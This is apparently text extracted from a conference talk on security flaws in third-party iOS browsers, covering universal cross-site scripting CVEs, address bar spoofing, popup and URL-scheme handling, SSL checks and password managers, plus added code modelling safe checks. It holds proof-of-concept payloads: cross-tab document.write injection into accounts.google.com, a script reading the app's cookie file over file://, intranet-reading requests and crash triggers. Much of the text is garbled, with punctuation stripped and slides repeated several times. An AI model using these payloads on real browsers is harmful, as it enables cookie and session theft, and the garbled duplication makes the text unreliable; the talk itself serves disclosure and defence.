Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007.
Universal Cross-Site Scripting in iOS browsers
• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser
Page JS: w = window.open('about:blank')
Bridge message: mb.exec$(WINDOW_ID)[ command: window.open, target: 1234, url: about:blank ] (the target id is a Math.random() value)
Native: [webView loadRequest: … "about:blank" …]
→ cross-frame forgery

Page JS: w.document.write('Hi')
Bridge message: mb.exec$(WINDOW_ID)[ command: window.document.write, target: 1234, html: Hi ]
Native: [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]

Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>')
… and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the content in the applewebdata:// origin. Same as file://: no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL … "about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
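The three cross-tab document.write bugs above (Mercury: no check; Yandex.Browser: check at window.open() only; Chrome: about:blank treated as "no URL") are all failures of the same native-side decision. The following is an added example written for this page, not the code of any of those browsers: a Node.js model of a UIWebView browser's JS-to-native bridge in which tabs are records with a current URL, and the policy for allowing a write into another tab is pluggable. Tab URLs, policy names and the hostnames attacker.tld and accounts.google.com are assumptions of the model; about:blank, file:, data: and applewebdata: are treated as opaque origins that never match anything, which is stricter than a real browser (where about:blank inherits the opener's origin) but is the conservative choice for a bolted-on bridge.

```javascript
'use strict';
// Hypothetical model, written for this page (not Mercury's, Yandex.Browser's
// or Chrome's real code), of a UIWebView-based browser's JS-to-native bridge
// for cross-tab window.open() and w.document.write(). Three policies:
//   'none'     - no same-origin check at all (the Mercury pattern)
//   'at-open'  - checked once at window.open(), never again (the Yandex pattern)
//   'at-write' - both origins recomputed at every document.write() (safe)

// Web origin of a URL, or null for anything that is not a real http(s) origin:
// about:blank, data:, file: and the applewebdata:// origin a UIWebView uses for
// loadHTMLString:baseURL:nil. null never compares equal, so such tabs are never
// "same-origin" with anyone. Uses Node's global WHATWG URL class.
function originOf(urlString) {
  let u;
  try { u = new URL(urlString); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return `${u.protocol}//${u.host}`; // host keeps a non-default port
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  return oa !== null && oa === originOf(b);
}

class Bridge {
  constructor(policy) {
    this.policy = policy;
    this.tabs = new Map(); // id -> { url, opener, allowedAtOpen, written }
    this.nextId = 1;
  }
  // Native side: a new UIWebView tab loading `url`; returns its id (the
  // slide's random target id).
  loadTab(url) {
    const id = this.nextId++;
    this.tabs.set(id, { url, opener: null, allowedAtOpen: false, written: null });
    return id;
  }
  // JS `w = window.open(url)` issued from tab `openerId`.
  windowOpen(openerId, url) {
    const id = this.loadTab(url);
    const t = this.tabs.get(id);
    t.opener = openerId;
    t.allowedAtOpen = sameOrigin(this.tabs.get(openerId).url, url);
    return id;
  }
  // Any later navigation of a tab: HTTP redirect, location=, link click, ...
  navigate(id, url) { this.tabs.get(id).url = url; }
  // JS `w.document.write(html)` issued from `callerId` against tab `targetId`.
  // Returns true when the bridge would run stringByEvaluatingJavaScriptFromString
  // in the target, i.e. when the injected markup executes in the target's origin.
  documentWrite(callerId, targetId, html) {
    const target = this.tabs.get(targetId);
    if (!target) return false;
    let allowed;
    switch (this.policy) {
      case 'none':     allowed = true; break;
      case 'at-open':  allowed = target.opener === callerId && target.allowedAtOpen; break;
      case 'at-write': allowed = target.opener === callerId &&
                                 sameOrigin(this.tabs.get(callerId).url, target.url); break;
      default: throw new Error('unknown policy ' + this.policy);
    }
    if (allowed) target.written = html;
    return allowed;
  }
}

// Replays the attacks from the slides against one policy and reports which of
// them got markup executed in another tab. Hostnames are constructed examples.
function runScenarios(policy) {
  const b = new Bridge(policy);
  const attacker = b.loadTab('http://attacker.tld/');
  // Mercury: open a foreign origin directly and write into it
  const direct = b.documentWrite(attacker,
    b.windowOpen(attacker, 'https://accounts.google.com/'), '<script src=...></script>');
  // Yandex: open a same-origin child, let it redirect, then write
  const child = b.windowOpen(attacker, 'http://attacker.tld/redirect');
  b.navigate(child, 'https://accounts.google.com/');
  const afterRedirect = b.documentWrite(attacker, child, '<script src=...></script>');
  // Chrome: about:blank must not become a privileged "no URL" origin
  const blank = b.documentWrite(attacker,
    b.windowOpen(attacker, 'about:blank'), '<script>document.write(location.href)</script>');
  // Legitimate use: a same-origin child that stayed same-origin
  const legit = b.documentWrite(attacker,
    b.windowOpen(attacker, 'http://attacker.tld/child'), 'Hi');
  return { direct, afterRedirect, blank, legit };
}
```

runScenarios('at-open') still lets the redirected child be written to, which is exactly the Yandex.Browser bug; only 'at-write', which asks "what is the target's origin right now?" at every privileged call, rejects all three attacks while keeping the legitimate same-origin case working. The same rule applies to any other bridge command that acts on another tab (location changes, cookie access, script evaluation): decide at the moment of the call, from native-side state, never from a flag cached earlier.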
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] → nil when the string is not a URL NSURL can parse (unescaped characters etc.), and a nil baseURL means applewebdata://
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) → NULL for the same kind of input
• Downloads opened directly from file://
Content-Disposition: attachment
• Displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• Isolated attachment origin (iOS 5+), but the attachment still sees:
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation') (a browser whose bolted-on same-origin check compares hostnames only is fooled this way)
Content-Type
• text/plain → rendered as HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → rendered as HTML
• application/other with filename *.html → rendered as HTML
JS without Same-Origin Policy: reading the app's cookie store from a file:// document
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  // rebuild the app container path (/private/var/mobile/Applications/<UUID>) from the current file:// URL
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest();
  x.open('GET', path, false); // synchronous, so responseText is ready right after send()
  x.send();
  alert(x.responseText);
}
</script>
JS without Same-Origin Policy: reading intranet content through the victim's browser
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://yourintranet/', false);
x.send();
alert(x.responseText);
</script>
Challenge: hijack password autofill
Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
URI schemes a browser app handles: Native (WebKit), Application (bolted-on), Bridge (internal), Registered (external)
Examples of bolted-on scheme handlers:
• scheme://download?https://secure.tld/victim/data vs. scheme://download?http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL null pointer dereference
• Any CFURL function that gets NULL as an argument (e.g. the NULL that CFURLCreateWithString returns for a string it cannot parse) will cause a null pointer dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
Opera Coast crash:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-002 (CVE-2014-1315, a format string issue in URL handling)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL
• By default, invalid certificates for UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 1/4 of the tested browsers: self-signed SSL certificates are silently accepted
• In some cases validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• The browser's JavaScript runs with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with or without user interaction)
• Password filling checks the domain but not always the URL scheme (https vs http)
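The three password-manager points above are all decisions the native side of a UIWebView browser has to make before it injects its autofill JavaScript. The following is an added example written for this page, not any browser's real code: a credential store that keys on the full origin (scheme, host and port) instead of the bare domain, refuses to fill or save anything for a subframe, and takes the document URL and top-frame flag from the native side rather than from values the page passes over the bridge. accounts.example.com and victim.example are constructed hostnames; weakHostOnlyMatch is included only to show what the domain-only check from the slide would do.

```javascript
'use strict';
// Hypothetical credential-store logic written for this page (not any browser's
// real code). It encodes the checks the slide says third-party iOS password
// managers get wrong: fill only in the top frame, match credentials on the full
// origin (scheme, host, port) and not just the domain, and save only under the
// origin of the document that actually displayed the login form.

// Web origin of a URL, or null for non-http(s) URLs (about:blank, file:, applewebdata:).
function originOf(urlString) {
  let u;
  try { u = new URL(urlString); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return `${u.protocol}//${u.host}`;
}

class CredentialStore {
  constructor() { this.byOrigin = new Map(); } // origin -> [{ username, password }]

  // Called by the native side when it observed a login-form submission.
  // `documentUrl` and `isTopFrame` come from the native side (the web view's
  // own request), never from values the page passed over the JS bridge, so a
  // page cannot ask for its credentials to be filed under another site.
  // Returns the origin stored under, or null if the submission was not saved.
  save(documentUrl, isTopFrame, username, password) {
    const origin = originOf(documentUrl);
    if (origin === null || !isTopFrame) return null;
    if (!this.byOrigin.has(origin)) this.byOrigin.set(origin, []);
    const list = this.byOrigin.get(origin);
    const existing = list.find(c => c.username === username);
    if (existing) existing.password = password; else list.push({ username, password });
    return origin;
  }

  // Credentials eligible for autofill in a frame loaded from `frameUrl`.
  // Subframes get nothing: the injected JS runs with top-frame privileges, and a
  // cross-origin subframe could otherwise harvest the top site's password.
  fillCandidates(frameUrl, isTopFrame) {
    if (!isTopFrame) return [];
    const origin = originOf(frameUrl);
    if (origin === null) return [];
    return (this.byOrigin.get(origin) || []).map(c => ({ username: c.username, password: c.password }));
  }
}

// The weak check from the slide, for comparison: the same host is enough, so a
// password saved on https://host is also filled on http://host, where an
// on-path attacker can inject the form and read the submission.
function weakHostOnlyMatch(savedUrl, pageUrl) {
  try { return new URL(savedUrl).hostname === new URL(pageUrl).hostname; }
  catch (e) { return false; }
}

// Constructed scenario: a credential saved on https, then requested from various pages.
function demo() {
  const store = new CredentialStore();
  const saved = store.save('https://accounts.example.com/login', true, 'alice', 'hunter2');
  return {
    saved,                                                                                    // 'https://accounts.example.com'
    httpsTop:      store.fillCandidates('https://accounts.example.com/login', true).length,   // 1
    httpTop:       store.fillCandidates('http://accounts.example.com/login', true).length,    // 0: scheme differs
    httpsSubframe: store.fillCandidates('https://accounts.example.com/login', false).length,  // 0: not the top frame
    otherPort:     store.fillCandidates('https://accounts.example.com:8443/', true).length,   // 0: port differs
    weakWouldFill: weakHostOnlyMatch('https://accounts.example.com/login', 'http://accounts.example.com/login'), // true
    subframeSave:  store.save('https://victim.example/login', false, 'alice', 'hunter2'),     // null: refused
  };
}
```

The scheme check is what closes the downgrade case from the slide: with weakHostOnlyMatch an attacker on the network only needs to get the victim onto http://accounts.example.com to have the https password filled into a form they control.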
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
